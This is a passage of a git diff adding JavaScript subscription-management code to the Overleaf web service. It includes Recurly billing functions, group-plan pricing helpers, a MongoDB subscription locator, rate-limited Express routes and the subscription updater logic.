) +} + +/** + * attempt to collect past due invoice for customer. Only do that when a) the + * customer is using Paypal and b) there is only one past due invoice. + * This is used because Recurly doesn't always attempt collection of paast due + * invoices after Paypal billing info were updated. + * + * @param recurlyAccountCode + */ +async function attemptPaypalInvoiceCollection(recurlyAccountCode) { + const billingInfo = + await RecurlyWrapper.promises.getBillingInfo(recurlyAccountCode) + + if (!billingInfo.paypal_billing_agreement_id) { + // this is not a Paypal user + return + } + + const pastDueInvoices = + await RecurlyWrapper.promises.getAccountPastDueInvoices(recurlyAccountCode) + + if (pastDueInvoices.length !== 1) { + // no past due invoices, or more than one. Ignore. + return + } + + return await RecurlyWrapper.promises.attemptInvoiceCollection( + pastDueInvoices[0].invoice_number + ) +} + +async function extendTrial(subscription, daysToExend) { + await RecurlyWrapper.promises.extendTrial( + subscription.recurlySubscription_id, + daysToExend + ) +} + +async function _updateSubscriptionFromRecurly(subscription) { + const recurlySubscription = await RecurlyWrapper.promises.getSubscription( + subscription.recurlySubscription_id, + {} + ) + await SubscriptionUpdater.promises.updateSubscriptionFromRecurly( + recurlySubscription, + subscription + ) +} + +/** + * Preview the effect of purchasing an add-on + * + * @param {string} userId + * @param {string} addOnCode + * @return {Promise<PaymentProviderSubscriptionChange>} + */ +async function previewAddonPurchase(userId, addOnCode) { + const subscription = await getSubscriptionForUser(userId) + + try { + await RecurlyClient.promises.getAddOn(subscription.planCode, addOnCode) + } catch (err) { + if (err instanceof recurly.errors.NotFoundError) { + throw new NotFoundError({ + message: 'Add-on not found', + info: { addOnCode }, + }) + } + throw err + } + + const changeRequest = subscription.getRequestForAddOnPurchase(addOnCode) + const change = + await RecurlyClient.promises.previewSubscriptionChange(changeRequest) + return change +} + +/** + * Purchase an add-on for a user + * + * @param {string} userId + * @param {string} addOnCode + * @param {number} quantity + */ +async function purchaseAddon(userId, addOnCode, quantity) { + const subscription = await getSubscriptionForUser(userId) + try { + await RecurlyClient.promises.getAddOn(subscription.planCode, addOnCode) + } catch (err) { + if (err instanceof recurly.errors.NotFoundError) { + throw new NotFoundError({ + message: 'Add-on not found', + info: { addOnCode }, + }) + } + throw err + } + const changeRequest = subscription.getRequestForAddOnPurchase( + addOnCode, + quantity + ) + await RecurlyClient.promises.applySubscriptionChangeRequest(changeRequest) + await syncSubscription({ uuid: subscription.id }, userId) +} + +/** + * Cancels and add-on for a user + * + * @param {string} userId + * @param {string} addOnCode + */ +async function removeAddon(userId, addOnCode) { + const subscription = await getSubscriptionForUser(userId) + const changeRequest = subscription.getRequestForAddOnRemoval(addOnCode) + await RecurlyClient.promises.applySubscriptionChangeRequest(changeRequest) + await syncSubscription({ uuid: subscription.id }, userId) +} + +/** + * Returns the Recurly UUID for the given user + * + * Throws a NotFoundError if the subscription can't be found + * + * @param {string} userId + * @return {Promise<PaymentProviderSubscription>} + */ +async function getSubscriptionForUser(userId) { + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(userId) + const recurlyId = subscription?.recurlySubscription_id + if (recurlyId == null) { + throw new NotFoundError({ + message: 'Recurly subscription not found', + info: { userId }, + }) + } + + try { + const subscription = await RecurlyClient.promises.getSubscription(recurlyId) + return subscription + } catch (err) { + if (err instanceof recurly.errors.NotFoundError) { + throw new NotFoundError({ + message: 'Subscription not found', + info: { userId, recurlyId }, + }) + } else { + throw err + } + } +} + +async function pauseSubscription(user, pauseCycles) { + // only allow pausing on monthly plans not in a trial + const { subscription } = + await LimitationsManager.promises.userHasSubscription(user) + if (!subscription || !subscription.recurlyStatus) { + throw new Error('No active subscription to pause') + } + + if ( + !subscription.planCode || + subscription.planCode.includes('ann') || + subscription.groupPlan + ) { + throw new Error('Can only pause monthly individual plans') + } + if ( + subscription.recurlyStatus.trialEndsAt && + subscription.recurlyStatus.trialEndsAt > new Date() + ) { + throw new Error('Cannot pause a subscription in a trial') + } + if (subscription.addOns?.length) { + throw new Error('Cannot pause a subscription with addons') + } + + await RecurlyClient.promises.pauseSubscriptionByUuid( + subscription.recurlySubscription_id, + pauseCycles + ) +} + +async function resumeSubscription(user) { + const { subscription } = + await LimitationsManager.promises.userHasSubscription(user) + if (!subscription || !subscription.recurlyStatus) { + throw new Error('No active subscription to resume') + } + await RecurlyClient.promises.resumeSubscriptionByUuid( + subscription.recurlySubscription_id + ) +} + +module.exports = { + validateNoSubscriptionInRecurly: callbackify(validateNoSubscriptionInRecurly), + createSubscription: callbackify(createSubscription), + previewSubscriptionChange: callbackify(previewSubscriptionChange), + updateSubscription: callbackify(updateSubscription), + cancelPendingSubscriptionChange: callbackify(cancelPendingSubscriptionChange), + cancelSubscription: callbackify(cancelSubscription), + reactivateSubscription: callbackify(reactivateSubscription), + syncSubscription: callbackify(syncSubscription), + attemptPaypalInvoiceCollection: callbackify(attemptPaypalInvoiceCollection), + extendTrial: callbackify(extendTrial), + previewAddonPurchase: callbackify(previewAddonPurchase), + purchaseAddon: callbackify(purchaseAddon), + removeAddon: callbackify(removeAddon), + pauseSubscription: callbackify(pauseSubscription), + resumeSubscription: callbackify(resumeSubscription), + promises: { + validateNoSubscriptionInRecurly, + createSubscription, + previewSubscriptionChange, + updateSubscription, + cancelPendingSubscriptionChange, + cancelSubscription, + reactivateSubscription, + syncSubscription, + attemptPaypalInvoiceCollection, + extendTrial, + previewAddonPurchase, + purchaseAddon, + removeAddon, + pauseSubscription, + resumeSubscription, + }, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionHelper.js b/services/web/app/src/Features/Subscription/SubscriptionHelper.js new file mode 100644 index 0000000..efb8895 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionHelper.js @@ -0,0 +1,92 @@ +const { formatCurrency } = require('../../util/currency') +const GroupPlansData = require('./GroupPlansData') + +/** + * If the user changes to a less expensive plan, we shouldn't apply the change immediately. + * This is to avoid unintended/artifical credits on users Recurly accounts. + */ +function shouldPlanChangeAtTermEnd(oldPlan, newPlan) { + return oldPlan.price_in_cents > newPlan.price_in_cents +} + +/** + * This is duplicated in: + * - services/web/scripts/plan-prices/plans.mjs + * - services/web/modules/subscriptions/frontend/js/pages/plans/group-member-picker/group-plan-pricing.js + * @param {number} number + * @returns {number} + */ +function roundUpToNearest5Cents(number) { + return Math.ceil(number * 20) / 20 +} + +/** + * @import { CurrencyCode } from '../../../../types/subscription/currency' + */ + +/** + * @typedef {Object} PlanToPrice + * @property {string} collaborator + * @property {string} professional + */ + +/** + * @typedef {Object} LocalizedGroupPrice + * @property {PlanToPrice} price + * @property {PlanToPrice} pricePerUser + * @property {PlanToPrice} pricePerUserPerMonth + */ + +/** + * @param {CurrencyCode} recommendedCurrency + * @param {string} locale + * @returns {LocalizedGroupPrice} + */ +function generateInitialLocalizedGroupPrice(recommendedCurrency, locale) { + const INITIAL_LICENSE_SIZE = 2 + + // the price is in cents, so divide by 100 to get the value + const collaboratorPrice = + GroupPlansData.enterprise.collaborator[recommendedCurrency][ + INITIAL_LICENSE_SIZE + ].price_in_cents / 100 + const collaboratorPricePerUser = collaboratorPrice / INITIAL_LICENSE_SIZE + const collaboratorPricePerUserPerMonth = roundUpToNearest5Cents( + collaboratorPrice / INITIAL_LICENSE_SIZE / 12 + ) + const professionalPrice = + GroupPlansData.enterprise.professional[recommendedCurrency][ + INITIAL_LICENSE_SIZE + ].price_in_cents / 100 + const professionalPricePerUser = professionalPrice / INITIAL_LICENSE_SIZE + const professionalPricePerUserPerMonth = roundUpToNearest5Cents( + professionalPrice / INITIAL_LICENSE_SIZE / 12 + ) + + /** + * @param {number} price + * @returns {string} + */ + const formatPrice = price => + formatCurrency(price, recommendedCurrency, locale, true) + + return { + price: { + collaborator: formatPrice(collaboratorPrice), + professional: formatPrice(professionalPrice), + }, + pricePerUser: { + collaborator: formatPrice(collaboratorPricePerUser), + professional: formatPrice(professionalPricePerUser), + }, + pricePerUserPerMonth: { + collaborator: formatPrice(collaboratorPricePerUserPerMonth), + professional: formatPrice(professionalPricePerUserPerMonth), + }, + } +} + +module.exports = { + shouldPlanChangeAtTermEnd, + generateInitialLocalizedGroupPrice, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionLocator.js b/services/web/app/src/Features/Subscription/SubscriptionLocator.js new file mode 100644 index 0000000..ac0fa59 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionLocator.js @@ -0,0 +1,142 @@ +const { callbackifyAll } = require('@overleaf/promise-utils') +const { Subscription } = require('../../models/Subscription') +const { DeletedSubscription } = require('../../models/DeletedSubscription') +const logger = require('@overleaf/logger') +const { + AI_ADD_ON_CODE, + isStandaloneAiAddOnPlanCode, +} = require('./PaymentProviderEntities') +require('./GroupPlansData') // make sure dynamic group plans are loaded + +const SubscriptionLocator = { + async getUsersSubscription(userOrId) { + const userId = SubscriptionLocator._getUserId(userOrId) + const subscription = await Subscription.findOne({ admin_id: userId }).exec() + logger.debug({ userId }, 'got users subscription') + return subscription + }, + + async getUserIndividualSubscription(userOrId) { + const userId = SubscriptionLocator._getUserId(userOrId) + const subscription = await Subscription.findOne({ + admin_id: userId, + groupPlan: false, + }).exec() + logger.debug({ userId }, 'got users individual subscription') + return subscription + }, + + async getManagedGroupSubscriptions(userOrId) { + return await Subscription.find({ + manager_ids: userOrId, + groupPlan: true, + }) + .populate('admin_id', ['_id', 'email']) + .exec() + }, + + async getMemberSubscriptions(userOrId, populate = []) { + const userId = SubscriptionLocator._getUserId(userOrId) + // eslint-disable-next-line no-restricted-syntax + return await Subscription.find({ member_ids: userId }) + .populate('admin_id', 'email') + .populate(populate) + .exec() + }, + + async getAdminEmail(subscriptionId) { + const subscription = await Subscription.findById(subscriptionId) + .populate('admin_id', 'email') + .exec() + + return subscription?.admin_id?.email + }, + + async getAdminEmailAndName(subscriptionId) { + const subscription = await Subscription.findById(subscriptionId) + .populate('admin_id', ['email', 'first_name', 'last_name']) + .exec() + + return subscription?.admin_id + }, + + async hasRecurlyGroupSubscription(userOrId) { + const userId = SubscriptionLocator._getUserId(userOrId) + return await Subscription.exists({ + groupPlan: true, + recurlySubscription_id: { $exists: true }, + $or: [ + { member_ids: userId }, + { manager_ids: userId }, + { admin_id: userId }, + ], + }).exec() + }, + + async getSubscription(subscriptionId) { + return await Subscription.findOne({ _id: subscriptionId }).exec() + }, + + async getSubscriptionByMemberIdAndId(userId, subscriptionId) { + return await Subscription.findOne( + { member_ids: userId, _id: subscriptionId }, + { _id: 1 } + ).exec() + }, + + async getGroupSubscriptionsMemberOf(userId) { + return await Subscription.find( + { member_ids: userId }, + { _id: 1, planCode: 1 } + ) + }, + + async getGroupsWithEmailInvite(email) { + return await Subscription.find({ invited_emails: email }).exec() + }, + + async getGroupsWithTeamInvitesEmail(email) { + return await Subscription.find( + { teamInvites: { $elemMatch: { email } } }, + { teamInvites: 1 } + ).exec() + }, + + async getGroupWithV1Id(v1TeamId) { + return await Subscription.findOne({ 'overleaf.id': v1TeamId }).exec() + }, + + async getUserDeletedSubscriptions(userId) { + return await DeletedSubscription.find({ + 'subscription.admin_id': userId, + }).exec() + }, + + async getDeletedSubscription(subscriptionId) { + return await DeletedSubscription.findOne({ + 'subscription._id': subscriptionId, + }).exec() + }, + + async hasAiAssist(userOrId) { + const userId = SubscriptionLocator._getUserId(userOrId) + const subscription = await Subscription.findOne({ admin_id: userId }).exec() + return Boolean( + isStandaloneAiAddOnPlanCode(subscription?.planCode) || + subscription?.addOns?.some(addOn => addOn.code === AI_ADD_ON_CODE) + ) + }, + + _getUserId(userOrId) { + if (userOrId && userOrId._id) { + return userOrId._id + } else if (userOrId) { + return userOrId + } + }, +} + +module.exports = { + ...callbackifyAll(SubscriptionLocator), + promises: SubscriptionLocator, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionRouter.mjs b/services/web/app/src/Features/Subscription/SubscriptionRouter.mjs new file mode 100644 index 0000000..0bb30b5 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionRouter.mjs @@ -0,0 +1,272 @@ +import AuthenticationController from '../Authentication/AuthenticationController.js' +import PermissionsController from '../Authorization/PermissionsController.js' +import SubscriptionController from './SubscriptionController.js' +import SubscriptionGroupController from './SubscriptionGroupController.mjs' +import TeamInvitesController from './TeamInvitesController.mjs' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import Settings from '@overleaf/settings' +import { Joi, validate } from '../../infrastructure/Validation.js' + +const teamInviteRateLimiter = new RateLimiter('team-invite', { + points: 10, + duration: 60, +}) + +const subscriptionRateLimiter = new RateLimiter('subscription', { + points: 30, + duration: 60, +}) + +const MAX_NUMBER_OF_USERS = 20 + +const addSeatsValidateSchema = { + body: Joi.object({ + adding: Joi.number().integer().min(1).max(MAX_NUMBER_OF_USERS).required(), + }), +} + +export default { + apply(webRouter, privateApiRouter, publicApiRouter) { + if (!Settings.enableSubscriptions) { + return + } + + webRouter.get( + '/user/subscription', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + PermissionsController.useCapabilities(), + SubscriptionController.userSubscriptionPage + ) + + webRouter.get( + '/user/subscription/thank-you', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.successfulSubscription + ) + + webRouter.get( + '/user/subscription/canceled', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.canceledSubscription + ) + + webRouter.get( + '/user/subscription/recurly/:pageType', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.redirectToHostedPage + ) + + webRouter.delete( + '/subscription/group/user', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + PermissionsController.requirePermission('leave-group-subscription'), + SubscriptionGroupController.removeSelfFromGroup + ) + + webRouter.get( + '/user/subscription/group/add-users', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.addSeatsToGroupSubscription + ) + + webRouter.post( + '/user/subscription/group/add-users/preview', + AuthenticationController.requireLogin(), + validate(addSeatsValidateSchema), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.previewAddSeatsSubscriptionChange + ) + + webRouter.post( + '/user/subscription/group/add-users/create', + AuthenticationController.requireLogin(), + validate(addSeatsValidateSchema), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.createAddSeatsSubscriptionChange + ) + + webRouter.post( + '/user/subscription/group/add-users/sales-contact-form', + validate({ + body: Joi.object({ + adding: Joi.number().integer().min(MAX_NUMBER_OF_USERS).required(), + }), + }), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.submitForm + ) + + webRouter.get( + '/user/subscription/group/upgrade-subscription', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.subscriptionUpgradePage + ) + + webRouter.post( + '/user/subscription/group/upgrade-subscription', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.upgradeSubscription + ) + + webRouter.get( + '/user/subscription/group/missing-billing-information', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.missingBillingInformation + ) + + webRouter.get( + '/user/subscription/group/manually-collected-subscription', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.manuallyCollectedSubscription + ) + + webRouter.get( + '/user/subscription/group/subtotal-limit-exceeded', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionGroupController.subtotalLimitExceeded + ) + + // Team invites + webRouter.get( + '/subscription/invites/:token/', + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + PermissionsController.useCapabilities(), + TeamInvitesController.viewInvite + ) + webRouter.get( + '/subscription/invites/', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + PermissionsController.useCapabilities(), + TeamInvitesController.viewInvites + ) + webRouter.put( + '/subscription/invites/:token/', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(teamInviteRateLimiter), + PermissionsController.requirePermission('join-subscription'), + TeamInvitesController.acceptInvite + ) + + // recurly callback + publicApiRouter.post( + '/user/subscription/callback', + RateLimiterMiddleware.rateLimit( + new RateLimiter('recurly-callback', { + points: 200, + duration: 60, + }) + ), + AuthenticationController.requireBasicAuth({ + [Settings.apis.recurly.webhookUser]: Settings.apis.recurly.webhookPass, + }), + SubscriptionController.recurlyNotificationParser, + SubscriptionController.recurlyCallback + ) + + // user changes their account state + webRouter.get( + '/user/subscription/preview', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.previewSubscription + ) + webRouter.get( + '/user/subscription/addon/:addOnCode/add', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.previewAddonPurchase + ) + webRouter.post( + '/user/subscription/addon/:addOnCode/add', + AuthenticationController.requireLogin(), + validate({ + params: Joi.object({ + addOnCode: Joi.string(), + }), + }), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.purchaseAddon + ) + webRouter.post( + '/user/subscription/addon/:addOnCode/remove', + AuthenticationController.requireLogin(), + validate({ + params: Joi.object({ + addOnCode: Joi.string(), + }), + }), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.removeAddon + ) + webRouter.post( + '/user/subscription/cancel-pending', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.cancelPendingSubscriptionChange + ) + webRouter.post( + '/user/subscription/cancel', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.cancelSubscription + ) + webRouter.post( + '/user/subscription/pause/:pauseCycles', + AuthenticationController.requireLogin(), + validate({ + params: Joi.object({ + pauseCycles: Joi.number().integer().max(12), + }), + }), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.pauseSubscription + ) + webRouter.post( + '/user/subscription/resume', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.resumeSubscription + ) + webRouter.post( + '/user/subscription/reactivate', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + PermissionsController.useCapabilities(), + SubscriptionController.reactivateSubscription + ) + + webRouter.post( + '/user/subscription/v1/cancel', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.cancelV1Subscription + ) + + webRouter.put( + '/user/subscription/extend', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.extendTrial + ) + + webRouter.post( + '/user/subscription/account/email', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(subscriptionRateLimiter), + SubscriptionController.updateAccountEmailAddress + ) + }, +} diff --git a/services/web/app/src/Features/Subscription/SubscriptionUpdater.js b/services/web/app/src/Features/Subscription/SubscriptionUpdater.js new file mode 100644 index 0000000..2e43454 --- /dev/null +++ b/services/web/app/src/Features/Subscription/SubscriptionUpdater.js @@ -0,0 +1,453 @@ +const { db, ObjectId } = require('../../infrastructure/mongodb') +const { callbackify } = require('@overleaf/promise-utils') +const { Subscription } = require('../../models/Subscription') +const SubscriptionLocator = require('./SubscriptionLocator') +const PlansLocator = require('./PlansLocator') +const FeaturesUpdater = require('./FeaturesUpdater') +const FeaturesHelper = require('./FeaturesHelper') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const { DeletedSubscription } = require('../../models/DeletedSubscription') +const logger = require('@overleaf/logger') +const Features = require('../../infrastructure/Features') +const UserAuditLogHandler = require('../User/UserAuditLogHandler') +const AccountMappingHelper = require('../Analytics/AccountMappingHelper') +const { SSOConfig } = require('../../models/SSOConfig') + +/** + * Change the admin of the given subscription. + * + * If the subscription is a group, add the new admin as manager while keeping + * the old admin. Otherwise, replace the manager. + * + * Validation checks are assumed to have been made: + * * subscription exists + * * user exists + * * user does not have another subscription + * * subscription is not a Recurly subscription + * + * If the subscription is Recurly, we silently do nothing. + */ +async function updateAdmin(subscription, adminId) { + const query = { + _id: new ObjectId(subscription._id), + customAccount: true, + } + const update = { + $set: { admin_id: new ObjectId(adminId) }, + } + if (subscription.groupPlan) { + update.$addToSet = { manager_ids: new ObjectId(adminId) } + } else { + update.$set.manager_ids = [new ObjectId(adminId)] + } + await Subscription.updateOne(query, update).exec() +} + +async function syncSubscription( + recurlySubscription, + adminUserId, + requesterData = {} +) { + let subscription = + await SubscriptionLocator.promises.getUsersSubscription(adminUserId) + if (subscription == null) { + subscription = await _createNewSubscription(adminUserId) + } + await updateSubscriptionFromRecurly( + recurlySubscription, + subscription, + requesterData + ) +} + +async function addUserToGroup(subscriptionId, userId) { + await UserAuditLogHandler.promises.addEntry( + userId, + 'join-group-subscription', + undefined, + undefined, + { subscriptionId } + ) + await Subscription.updateOne( + { _id: subscriptionId }, + { $addToSet: { member_ids: userId } } + ).exec() + await FeaturesUpdater.promises.refreshFeatures(userId, 'add-to-group') + await _sendUserGroupPlanCodeUserProperty(userId) + await _sendSubscriptionEvent( + userId, + subscriptionId, + 'group-subscription-joined' + ) +} + +async function removeUserFromGroup(subscriptionId, userId) { + await UserAuditLogHandler.promises.addEntry( + userId, + 'leave-group-subscription', + undefined, + undefined, + { subscriptionId } + ) + await Subscription.updateOne( + { _id: subscriptionId }, + { $pull: { member_ids: userId } } + ).exec() + await FeaturesUpdater.promises.refreshFeatures( + userId, + 'remove-user-from-group' + ) + await _sendUserGroupPlanCodeUserProperty(userId) + await _sendSubscriptionEvent( + userId, + subscriptionId, + 'group-subscription-left' + ) +} + +async function removeUserFromAllGroups(userId) { + const subscriptions = + await SubscriptionLocator.promises.getMemberSubscriptions(userId) + if (subscriptions.length === 0) { + return + } + const subscriptionIds = subscriptions.map(sub => sub._id) + const removeOperation = { $pull: { member_ids: userId } } + + for (const subscriptionId of subscriptionIds) { + await UserAuditLogHandler.promises.addEntry( + userId, + 'leave-group-subscription', + undefined, + undefined, + { subscriptionId } + ) + } + + await Subscription.updateMany( + { _id: subscriptionIds }, + removeOperation + ).exec() + await FeaturesUpdater.promises.refreshFeatures( + userId, + 'remove-user-from-groups' + ) + for (const subscriptionId of subscriptionIds) { + await _sendSubscriptionEvent( + userId, + subscriptionId, + 'group-subscription-left' + ) + } + await _sendUserGroupPlanCodeUserProperty(userId) +} + +async function deleteWithV1Id(v1TeamId) { + await Subscription.deleteOne({ 'overleaf.id': v1TeamId }).exec() +} + +async function deleteSubscription(subscription, deleterData) { + // 1. create deletedSubscription + await createDeletedSubscription(subscription, deleterData) + + // 2. notify analytics that members left the subscription + await _sendSubscriptionEventForAllMembers( + subscription._id, + 'group-subscription-left' + ) + + // 3. remove subscription + await Subscription.deleteOne({ _id: subscription._id }).exec() + + // 4. refresh users features + await _scheduleRefreshFeatures(subscription) +} + +async function restoreSubscription(subscriptionId) { + const deletedSubscription = + await SubscriptionLocator.promises.getDeletedSubscription(subscriptionId) + const subscription = deletedSubscription.subscription + + // 1. upsert subscription + await db.subscriptions.updateOne( + { _id: subscription._id }, + { $set: subscription }, + { upsert: true } + ) + + // 2. refresh users features. Do this before removing the + // subscription so the restore can be retried if this fails + await refreshUsersFeatures(subscription) + + // 3. remove deleted subscription + await DeletedSubscription.deleteOne({ + 'subscription._id': subscription._id, + }).exec() + + // 4. notify analytics that members rejoined the subscription + await _sendSubscriptionEventForAllMembers( + subscriptionId, + 'group-subscription-joined' + ) +} + +async function refreshUsersFeatures(subscription) { + const userIds = [subscription.admin_id].concat(subscription.member_ids || []) + for (const userId of userIds) { + await FeaturesUpdater.promises.refreshFeatures( + userId, + 'subscription-updater' + ) + } +} + +async function _scheduleRefreshFeatures(subscription) { + const userIds = [subscription.admin_id].concat(subscription.member_ids || []) + for (const userId of userIds) { + await FeaturesUpdater.promises.scheduleRefreshFeatures( + userId, + 'subscription-updater' + ) + } +} + +async function createDeletedSubscription(subscription, deleterData) { + subscription.teamInvites = [] + subscription.invited_emails = [] + const filter = { 'subscription._id': subscription._id } + const data = { + deleterData: { + deleterId: deleterData.id, + deleterIpAddress: deleterData.ip, + }, + subscription, + } + const options = { upsert: true, new: true, setDefaultsOnInsert: true } + await DeletedSubscription.findOneAndUpdate(filter, data, options).exec() +} + +async function _createNewSubscription(adminUserId) { + const subscription = new Subscription({ + admin_id: adminUserId, + manager_ids: [adminUserId], + }) + await subscription.save() + return subscription +} + +async function _deleteAndReplaceSubscriptionFromRecurly( + recurlySubscription, + subscription, + requesterData +) { + const adminUserId = subscription.admin_id + await deleteSubscription(subscription, requesterData) + const newSubscription = await _createNewSubscription(adminUserId) + await updateSubscriptionFromRecurly( + recurlySubscription, + newSubscription, + requesterData + ) +} + +async function updateSubscriptionFromRecurly( + recurlySubscription, + subscription, + requesterData +) { + if (recurlySubscription.state === 'expired') { + const hasManagedUsersFeature = + Features.hasFeature('saas') && subscription?.managedUsersEnabled + + // If a payment lapses and if the group is managed or has group SSO, as a temporary measure we need to + // make sure that the group continues as-is and no destructive actions are taken. + if (hasManagedUsersFeature) { + logger.warn( + { subscriptionId: subscription._id }, + 'expired subscription has managedUsers feature enabled, skipping deletion' + ) + } else { + let hasGroupSSOEnabled = false + if (subscription?.ssoConfig) { + const ssoConfig = await SSOConfig.findOne({ + _id: subscription.ssoConfig._id || subscription.ssoConfig, + }) + .lean() + .exec() + if (ssoConfig.enabled) { + hasGroupSSOEnabled = true + } + } + + if (hasGroupSSOEnabled) { + logger.warn( + { subscriptionId: subscription._id }, + 'expired subscription has groupSSO feature enabled, skipping deletion' + ) + } else { + await deleteSubscription(subscription, requesterData) + } + } + return + } + const updatedPlanCode = recurlySubscription.plan.plan_code + const plan = PlansLocator.findLocalPlanInSettings(updatedPlanCode) + + if (plan == null) { + throw new Error(`plan code not found: ${updatedPlanCode}`) + } + if (!plan.groupPlan && subscription.groupPlan) { + // If downgrading from group to individual plan, delete group sub and create a new one + await _deleteAndReplaceSubscriptionFromRecurly( + recurlySubscription, + subscription, + requesterData + ) + return + } + + const addOns = recurlySubscription?.subscription_add_ons?.map(addOn => { + return { + addOnCode: addOn.add_on_code, + quantity: addOn.quantity, + unitAmountInCents: addOn.unit_amount_in_cents, + } + }) + + subscription.recurlySubscription_id = recurlySubscription.uuid + subscription.planCode = updatedPlanCode + subscription.addOns = addOns || [] + subscription.recurlyStatus = { + state: recurlySubscription.state, + trialStartedAt: recurlySubscription.trial_started_at, + trialEndsAt: recurlySubscription.trial_ends_at, + } + + if (plan.groupPlan) { + if (!subscription.groupPlan) { + subscription.member_ids = subscription.member_ids || [] + subscription.member_ids.push(subscription.admin_id) + } + + subscription.groupPlan = true + subscription.membersLimit = plan.membersLimit + + // Some plans allow adding more seats than the base plan provides. + // This is recorded as a subscription add on. + if ( + plan.membersLimitAddOn && + Array.isArray(recurlySubscription.subscription_add_ons) + ) { + recurlySubscription.subscription_add_ons.forEach(addOn => { + if (addOn.add_on_code === plan.membersLimitAddOn) { + subscription.membersLimit += addOn.quantity + } + }) + } + } + await subscription.save() + + const accountMapping = + AccountMappingHelper.generateSubscriptionToRecurlyMapping( + subscription._id, + subscription.recurlySubscription_id + ) + if (accountMapping) { + AnalyticsManager.registerAccountMapping(accountMapping) + } + + await _scheduleRefreshFeatures(subscription) +} + +async function _sendUserGroupPlanCodeUserProperty(userId) { + try { + const subscriptions = + await SubscriptionLocator.promises.getMemberSubscriptions(userId) + let bestPlanCode = null + let bestFeatures = {} + for (const subscription of subscriptions) { + const plan = PlansLocator.findLocalPlanInSettings(subscription.planCode) + if ( + plan && + FeaturesHelper.isFeatureSetBetter(plan.features, bestFeatures) + ) { + bestPlanCode = plan.planCode + bestFeatures = plan.features + } + } + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'group-subscription-plan-code', + bestPlanCode + ) + } catch (error) { + logger.error( + { err: error }, + `Failed to update group-subscription-plan-code property for user ${userId}` + ) + } +} + +async function _sendSubscriptionEvent(userId, subscriptionId, event) { + const subscription = await Subscription.findOne( + { _id: subscriptionId }, + { recurlySubscription_id: 1, groupPlan: 1 } + ) + if (!subscription || !subscription.groupPlan) { + return + } + AnalyticsManager.recordEventForUserInBackground(userId, event, { + groupId: subscription._id.toString(), + subscriptionId: subscription.recurlySubscription_id, + }) +} + +async function _sendSubscriptionEventForAllMembers(subscriptionId, event) { + const subscription = await Subscription.findOne( + { _id: subscriptionId }, + { + recurlySubscription_id: 1, + member_ids: 1, + groupPlan: 1, + } + ) + if (!subscription) { + return + } + const userIds = (subscription.member_ids || []).filter(Boolean) + for (const userId of userIds) { + if (userId) { + AnalyticsManager.recordEventForUserInBackground(userId, event, { + groupId: subscription._id.toString(), + subscriptionId: subscription.recurlySubscription_id, + }) + } + } +} + +module.exports = { + updateAdmin: callbackify(updateAdmin), + syncSubscription: callbackify(syncSubscription), + deleteSubscription: callbackify(deleteSubscription), + createDeletedSubscription: callbackify(createDeletedSubscription), + addUserToGroup: callbackify(addUserToGroup), + refreshUsersFeatures: callbackify(refreshUsersFeatures), + removeUserFromGroup: callbackify(removeUserFromGroup), + removeUserFromAllGroups: callbackify(removeUserFromAllGroups), + deleteWithV1Id: callbackify(deleteWithV1Id), + restoreSubscription: callbackify(restoreSubscription), + updateSubscriptionFromRecurly: callbackify(updateSubscriptionFromRecurly), + promises: { + updateAdmin, + 